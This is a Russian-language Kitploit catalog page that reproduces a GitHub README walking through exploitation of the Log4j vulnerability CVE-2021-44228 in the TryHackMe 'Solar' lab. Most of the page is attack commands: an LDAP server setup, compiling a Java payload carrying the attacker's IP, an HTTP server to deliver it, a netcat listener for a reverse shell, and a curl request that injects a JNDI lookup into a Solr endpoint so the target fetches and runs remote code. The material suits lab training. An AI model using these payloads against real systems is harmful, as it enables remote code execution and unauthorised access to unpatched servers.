Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
log4j | Kitploit
Инструменты/GitHubGitHub/h3x0v3rl0rd/log4j
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubh3x0v3rl0rd/log4j

log4j

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

💻 -h3x0v3rl0rd-

эксплуатация log4j CVE-2021-44228 ( TryHackMe Solar, прохождение)

root@kitploit:~
git clone https://github.com/n3rdh4x0r/log4j.git 

1. Запустите log4j.py (это установит все необходимые приложения и запустит LDAP-сервер)

root@kitploit:~
ifconfig tun0
python3 log4j.py 10.8.227.251

image

2. Добавьте IP-адрес атакующего в файл Exploit.java

2021-12-19_00-52

3. Скомпилируйте полезную нагрузку

root@kitploit:~
javac Exploit.java -source 8 -target 8

image

4. Временный HTTP-сервер

root@kitploit:~
python3 -m http.server 8888

image

5. Слушатель netcat

root@kitploit:~
nc -lnvp 9999

image

6. Наконец, всё, что осталось сделать, — это запустить эксплойт и отправить наш JNDI-синтаксис! Обратите внимание на изменения номера порта (теперь он указывает на наш LDAP-сервер) и на ресурс, который мы запрашиваем, указывая наш эксплойт:

root@kitploit:~
curl 'http://10.10.45.175:8983/solr/admin/cores?foo=$\{jndi:ldap://10.8.227.251:1389/Exploit\}'

image

image

Скачать инструмент